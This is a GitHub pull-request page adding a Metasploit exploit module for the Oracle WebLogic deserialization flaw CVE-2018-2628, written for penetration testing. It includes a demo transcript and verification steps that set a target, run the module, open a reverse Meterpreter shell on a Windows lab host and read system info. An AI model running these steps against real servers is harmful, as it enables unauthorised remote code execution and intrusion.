Add weblogic_deserialize module CVE-2018-2628 #10436

Merged
merged 2 commits into from Aug 9, 2018

Conversation

@jrobles-r7
Contributor

commented Aug 8, 2018

Adds a module for CVE-2018-2628, Oracle Weblogic Deserialization Vuln.
Currently works on Windows.
The module has been tested against Oracle Weblogic Server 10.3.6.0 running with JDK v7u17.

Future TODO

  • Add/Test on Linux
  • Fix Docs

Demo

msf5 exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.175
rhosts => 172.22.222.175
msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121
srvhost => 172.22.222.121
msf5 exploit(multi/misc/weblogic_deserialize) > set srvport 8888
srvport => 8888
msf5 exploit(multi/misc/weblogic_deserialize) > run
[*] Exploit running as background job 0.
msf5 exploit(multi/misc/weblogic_deserialize) > 
[*] Started reverse TCP handler on 172.22.222.121:4444 
[*] Sending stage (179779 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49908) at 2018-08-08 17:53:07 -0500
sessions -i 1
[*] Starting interaction with 1...
 meterpreter > sysinfo
Computer        : _
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

Verification

  • ./msfconsole -q
  • use exploit/windows/misc/weblogic_deserialize
  • set rhosts <rhost>
  • set srvhost <srvhost>
  • set srvport <srvport>
  • run
  • Get a shell

@wchen-r7 wchen-r7 self-assigned this Aug 8, 2018

@wchen-r7 wchen-r7 merged commit 66e5685 into rapid7:master Aug 9, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
wchen-r7 added a commit that referenced this pull request Aug 9, 2018
msjenkins-r7 added a commit that referenced this pull request Aug 9, 2018
@wchen-r7

Contributor

commented Aug 9, 2018

Release Notes

This adds an exploit module for CVE-2018-2628, targeting an Oracle Weblogic deserialization vulnerability on Windows. The module has been tested against Oracle Weblogic Server 10.3.6.0 running with JDK v7u17.

@jrobles-r7 jrobles-r7 deleted the jrobles-r7:weblogic-deserial-rce branch Aug 9, 2018

@kfr-ma

Contributor

commented Aug 16, 2018

Hi guys,

Good work, good news :) We were waiting for this module. Do u have any idea of the release date for the linux/universal version of this exploit?
We can test it with u for linux / unix environment.

Thx in advance.

@jrobles-r7

Contributor Author

commented Aug 16, 2018

Including a condition check before generating the payload here might be what you want. If the target is Linux, generate a non-PowerShell command.

@kfr-ma

Contributor

commented Aug 16, 2018

Yes jrobles-r7, this is my need.

Thx.
